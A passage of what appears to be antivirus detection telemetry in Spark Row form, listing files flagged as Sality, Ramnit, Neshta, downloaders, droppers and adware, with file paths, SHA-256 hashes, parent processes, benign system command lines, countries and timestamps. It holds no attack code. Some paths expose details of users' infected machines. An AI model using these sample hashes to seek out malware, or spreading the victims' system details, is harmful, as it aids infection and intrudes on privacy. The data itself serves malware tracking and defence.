dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='common.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\COMMON\\COMMON.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='245f9c9243679eb41520541d49e890f077dd70123070e3bfca94ac18cdd1fc81', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='24e578da3af8c149fdcb96bf7509f8852ef73c0007d985e25d9ad2cdf87db090', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\24E578DA3AF8C149FDCB96BF7509F8852EF73C0007D985E25D9AD2CDF87DB090', filesize=1856000, name='HEUR/AGEN.1031594.#M1.#R1'), hash='24e578da3af8c149fdcb96bf7509f8852ef73c0007d985e25d9ad2cdf87db090', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='terrain.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL13\\TERRAIN\\TERRAIN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24f7ce4e372d94cb3d91cc79e54cbecebd3b8c8ef4d79b945d0d1eeb8f5ec887', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-205428-02c8644d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_06b172c4\\AVSCAN-20181102-205309-F8D8B1C1\\AVSCAN-20181102-205428-02C8644D', filesize=1792000, name='TR/AD.Bhottle.fmbdh.#M1.#R1'), hash='251e9a9e2489ce743164fbaaa948e58e70c819f0862e996beacd4be7ccf9d437', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:54:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='weatherlord2-hiddenrealm.exe', filepath='D:\\+I G R E +\\BEST of IGRE 2013\\Weather Lord 2 Hidden Realm Setup\\WeatherLord2-HiddenRealm.exe', filesize=1792000, name='TR/Rogue.10415921.#M1.#R1'), hash='251e9a9e2489ce743164fbaaa948e58e70c819f0862e996beacd4be7ccf9d437', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:52:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2.exe', filepath='E:\\Box Files\\SPDMTK_FILES\\Box Installer\\Miracle Falcon Box\\2.exe', filesize=960000, name='W32/Sality.AG.#M1.#R1'), hash='252649fe13bd4f0e7baf7f453e19fe39432f294891d9b4941328b3af91194a6a', metadata=Row(cmdline='\\\\\\/onboot', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WWW.HOSTJSC.NET\\Internet Download Manager\\IDMan.exe', parentsize=990720, timestamp='2018-11-02T11:48:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2.exe', filepath='E:\\Box Files\\SPDMTK_FILES\\Box Installer\\Miracle Falcon Box\\2.exe', filesize=960000, name='W32/Sality.AG.#M1.#R1'), hash='252649fe13bd4f0e7baf7f453e19fe39432f294891d9b4941328b3af91194a6a', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\BlueStacks\\HD-Network.exe', parentsize=451800, timestamp='2018-11-02T11:48:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\MITSUBISHI LUCIANO\\OUTLANDER\\OUTLANDER 2011\\11OUTLANDER PWRE1012R JUN 2010\\SERVICE\\DATA\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='25575af433ceab482a458fce057f04314fef232568a9d10b82c8c395c28a2710', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:08:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ticogi.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7186362\\ticogi.exe', filesize=384000, name='HEUR/AGEN.1000017.#M1.#R1'), hash='25c83b8764939fdf7a368219bae83a90bacdde6f2df0642676d50658a0684afb', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:T3RNZyFaKB9EbHY2 \\\\\\/mnl', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Programs\\JavaSetup_2512067144.exe', parentsize=2446409, timestamp='2018-11-02T22:59:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ticogi.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4494210\\ticogi.exe', filesize=384000, name='HEUR/AGEN.1000017.#M1.#R1'), hash='25c83b8764939fdf7a368219bae83a90bacdde6f2df0642676d50658a0684afb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:27:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ticogi.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4494210\\ticogi.exe', filesize=384000, name='HEUR/AGEN.1000017.#M1.#R1'), hash='25c83b8764939fdf7a368219bae83a90bacdde6f2df0642676d50658a0684afb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:27:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-235403-b4608112', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0c7bd56c\\AVSCAN-20181102-235311-AFD88DC4\\AVSCAN-20181102-235403-B4608112', filesize=384000, name='HEUR/AGEN.1000017.#M1.#R1'), hash='25c83b8764939fdf7a368219bae83a90bacdde6f2df0642676d50658a0684afb', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:53:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ticogi.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3478938\\ticogi.exe', filesize=384000, name='HEUR/AGEN.1000017.#M1.#R1'), hash='25c83b8764939fdf7a368219bae83a90bacdde6f2df0642676d50658a0684afb', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:T3RNZyFaKB9EbHY2 \\\\\\/mnl', country='MA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Programs\\JavaSetup_2314384483.exe', parentsize=2446409, timestamp='2018-11-02T22:51:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ticogi.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7186362\\ticogi.exe', filesize=384000, name='HEUR/AGEN.1000017.#M1.#R1'), hash='25c83b8764939fdf7a368219bae83a90bacdde6f2df0642676d50658a0684afb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:59:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-145841-66628ad8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8267e1c0\\AVSCAN-20181103-142351-5EBE9D93\\AVSCAN-20181103-145841-66628AD8', filesize=3036000, name='TR/Crypt.ZPACK.qqbrf.#M1.#R1'), hash='25fbbf082343d30cadca3caf9574d9a735aa88df7b2fde6b8a0ee46ac10a4311', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T12:58:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='26c4acfcd7541ae62fb29525bd05b49ee443af0e849669e32fe42f55f2e4f4c1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\26C4ACFCD7541AE62FB29525BD05B49EE443AF0E849669E32FE42F55F2E4F4C1', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='26c4acfcd7541ae62fb29525bd05b49ee443af0e849669e32fe42f55f2e4f4c1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:42:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='26c4acfcd7541ae62fb29525bd05b49ee443af0e849669e32fe42f55f2e4f4c1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\26C4ACFCD7541AE62FB29525BD05B49EE443AF0E849669E32FE42F55F2E4F4C1', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='26c4acfcd7541ae62fb29525bd05b49ee443af0e849669e32fe42f55f2e4f4c1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:02:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ai.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL1\\AI\\AI.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='26da584ca5ab584d801c79fd3d022992fcc724b7169097d2e6dabdac0880f111', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='textures.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\COMMON\\TEXTURES\\TEXTURES.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='26da584ca5ab584d801c79fd3d022992fcc724b7169097d2e6dabdac0880f111', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='010_4b29ace8_5d35dba5.exe', filepath='C:\\Users\\X\\Videos\\010_4b29ace8_5d35dba5.exe', filesize=223744000, name='HEUR/AGEN.1020711.#M1.#R1'), hash='275708ee348025aa0ed366d42feab1944c5c7411f2c2209c84cefa0a9d77e38d', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T09:39:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jre-8u91-windows-i586.exe', filepath='C:\\program files\\djkn-siman\\Resource\\Java\\jre-8u91-windows-i586.exe', filesize=51072000, name='TR/Patched.Ren.Gen.#M300.#R344'), hash='2798a5446a67a48d75aa894ddf982e21b4a72ba75d00cc4fcc921d985391d130', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:xxnxzl\\\\\\/wAEutAavd.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-02T13:15:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gzssz.dll', filepath='D:\\MariaDB\\lib\\plugin\\gzssz.dll', filesize=64000, name='W32/Ramnit.CD.#M1.#R1'), hash='27bcd2ea9456476b7ab0881ee7704d030721b09856caa463554d383754cd40e6', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T22:29:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tnkge.dll', filepath='D:\\MariaDB\\lib\\plugin\\tnkge.dll', filesize=64000, name='W32/Ramnit.CD.#M1.#R1'), hash='27bcd2ea9456476b7ab0881ee7704d030721b09856caa463554d383754cd40e6', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T22:29:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ngen.exe', filepath='E:\\金蝶K3\\K3_WISE_V14.3资源盘\\K3_Wise_V14.3_Resource\\OS_CHT\\DOTNETFX35\\sxs\\x86_netfx-ngen_exe_b03f5f7f11d50a3a_6.2.9200.16384_none_82bd772bfa7bef58\\ngen.exe', filesize=168000, name='W32/Sality.AT.#M1.#R1'), hash='281652158bc60b8e93ac26fe9832d82ee499dd70ce279cc27205dfa6224566c6', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gpgsplit.exe', filepath='\\\\?\\C:\\NIFPGA\\programs\\Vivado2013_4\\tps\\win32\\git-1.8.3\\bin\\gpgsplit.exe', filesize=256000, name='W32/Sality.AT.#M1.#R1'), hash='284cc3e7c6877e694e4ee78d4c588d5a36daaacd6c15d583def03eb0f277da1f', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:51:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gpgsplit.exe', filepath='\\\\?\\C:\\NIFPGA\\programs\\Vivado2013_4\\tps\\win32\\git-1.8.3\\bin\\gpgsplit.exe', filesize=256000, name='W32/Sality.AT.#M1.#R1'), hash='284cc3e7c6877e694e4ee78d4c588d5a36daaacd6c15d583def03eb0f277da1f', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:51:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='spinstall.exe', filepath='C:\\Windows\\System32\\spinstall.exe', filesize=448000, name='TR/Patched.Gen.#M300.#R2947'), hash='28bb865ea1e35ae022aacf8a7ed192e757aea0361800719a6a88774250b69886', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-02T01:52:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xf-adsk2015_x64.exe', filepath='C:\\Program Files\\Autodesk\\AutoCAD 2015\\xf-adsk2015_x64.exe', filesize=512000, name='TR/Crypt.ULPM.Gen.#M300.#R2603'), hash='29e89e82f6e359cc188c267ac082fb4537e474ea02e7dea9bac1bcaae26c189b', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T04:19:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{3EBF898E-6BAB-4161-B420-37443DC0569C}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='2a209bc68a3f64655ff3d23d2e4f09e79584b31d6a5ec8bbe9ba88872f6711e4', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:40:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155925-6265ffa3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_45e3c45c\\AVSCAN-20181102-155854-5DC787B7\\AVSCAN-20181102-155925-6265FFA3', filesize=268000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='2a8c955e352e926965365975b18880dde4ab7b2259b797afeaa2ca981577b677', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:59:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uninstaller.exe', filepath='C:\\Program Files\\GNIEX70I7B\\uninstaller.exe', filesize=192000, name='ADWARE/EoRezo.Gen7.#M300.#R602706'), hash='2a966baf4067f0fe13d8452bc01488c35f700a28a200eff4dfd7c999096ab39c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=114408, timestamp='2018-11-02T11:12:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='75dc6aa1b03c57b9b03d466a08bfea9e1d74f8c8', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\75dc6aa1b03c57b9b03d466a08bfea9e1d74f8c8', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='2a9bac407e18ec1ec715194b7cc0a9dfd46637444a64fb007dffd7451d50a150', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:45:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2b281f21b6ec5e53939a80df65b9b361fce25140e055722265d95073211fa812', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2B281F21B6EC5E53939A80DF65B9B361FCE25140E055722265D95073211FA812', filesize=192000, name='TR/Crypt.ZPACK.Gen.#M300.#R555'), hash='2b281f21b6ec5e53939a80df65b9b361fce25140e055722265d95073211fa812', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:45:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2b281f21b6ec5e53939a80df65b9b361fce25140e055722265d95073211fa812', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2B281F21B6EC5E53939A80DF65B9B361FCE25140E055722265D95073211FA812', filesize=192000, name='TR/Crypt.ZPACK.Gen.#M300.#R555'), hash='2b281f21b6ec5e53939a80df65b9b361fce25140e055722265d95073211fa812', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:01:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2b281f21b6ec5e53939a80df65b9b361fce25140e055722265d95073211fa812', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2B281F21B6EC5E53939A80DF65B9B361FCE25140E055722265D95073211FA812', filesize=192000, name='TR/Crypt.ZPACK.Gen.#M300.#R555'), hash='2b281f21b6ec5e53939a80df65b9b361fce25140e055722265d95073211fa812', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:32:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00004b01', filepath='C:\\Windows\\Temp\\tmp00001759\\tmp00004b01', filesize=12800000, name='TR/Patched.Ren.Gen.#M300.#R3134'), hash='2bb3a4ed28e197ac363bd4f053e8ed5aca35b07d8b95b92369e092aa70b8b92d', metadata=Row(cmdline='-k bdx -s scan', country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-02T11:50:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ie4uinit.exe', filepath='\\\\?\\E:\\Windows.old\\WINDOWS\\System32\\ie4uinit.exe', filesize=256000, name='W32/Neshta.A.#M1.#R1'), hash='2c0860deb5bc0f6becc1a34e16de9b28724f77acaba2184b8f1d6f97d7c6f903', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:56:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='models.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\MODELS\\MODELS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2c518e8aa5bb143e1ddee53f8712262129b5a411942a728bd2a3f0babbdedbcf', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2c9f9e2d93243fff2d209fb9bece4cc53c703688686962d69b3067c6546a729a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2C9F9E2D93243FFF2D209FB9BECE4CC53C703688686962D69B3067C6546A729A', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='2c9f9e2d93243fff2d209fb9bece4cc53c703688686962d69b3067c6546a729a', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:33:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2c9f9e2d93243fff2d209fb9bece4cc53c703688686962d69b3067c6546a729a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2C9F9E2D93243FFF2D209FB9BECE4CC53C703688686962D69B3067C6546A729A', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='2c9f9e2d93243fff2d209fb9bece4cc53c703688686962d69b3067c6546a729a', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:47:41Z'), dt=datetime.date(2018, 11, 2)),
